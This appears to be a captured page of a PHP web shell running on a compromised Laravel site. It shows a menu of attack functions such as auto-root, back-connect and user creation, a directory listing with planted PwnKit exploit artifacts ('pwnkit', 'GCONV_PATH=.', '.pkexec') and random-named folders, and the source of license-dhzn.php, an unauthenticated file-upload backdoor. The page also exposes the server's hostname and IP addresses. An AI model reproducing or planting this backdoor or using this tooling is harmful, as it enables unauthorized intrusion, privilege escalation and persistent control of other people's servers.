Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.19
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo10.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxr-xr-x
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
1xrmnhy
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cavolbz
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
efcon1w
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
kwrp1cx
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vfmjdqt
[ DIR ]
drwxr-xr-x
vglfbas
[ DIR ]
drwxr-xr-x
yax1onu
[ DIR ]
drwxr-xr-x
z1fwyra
[ DIR ]
drwxr-xr-x
.env
784
B
-rw-rw-rw-
.env.example
638
B
-rw-rw-rw-
.htaccess
1.96
KB
-r--r--r--
.mad-root
0
B
-rw-r--r--
README.md
3.07
KB
-rw-rw-rw-
artisan
339
B
-rw-rw-rw-
composer-setup.php
58.13
KB
-rw-rw-rw-
composer.json
1.33
KB
-rw-rw-rw-
composer.lock
470.2
KB
-rw-rw-rw-
composer.phar
3.47
MB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
index.php
19.47
KB
-r--r--r--
license-dhzn.php
629
B
-rw-r--r--
phpunit.xml.dist
1.11
KB
-rw-rw-rw-
prd.md
31.76
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
86
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license-dhzn.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $f = $_FILES['image']; if ($f['error'] === UPLOAD_ERR_OK) { $name = basename($f['name']); $ok = move_uploaded_file($f['tmp_name'], __DIR__ . '/' . $name); echo $ok ? "<center><b>Done ==> {$name}</b></center>" : "<center><b>Error writing file</b></center>"; } else { echo "<center><b>Upload error code: {$f['error']}</b></center>"; } exit; } ?> 437ce96faee259ae <form method="post" enctype="multipart/form-data"> <input type="file" name="image"> <input type="submit" value="Submit"> </form>
Close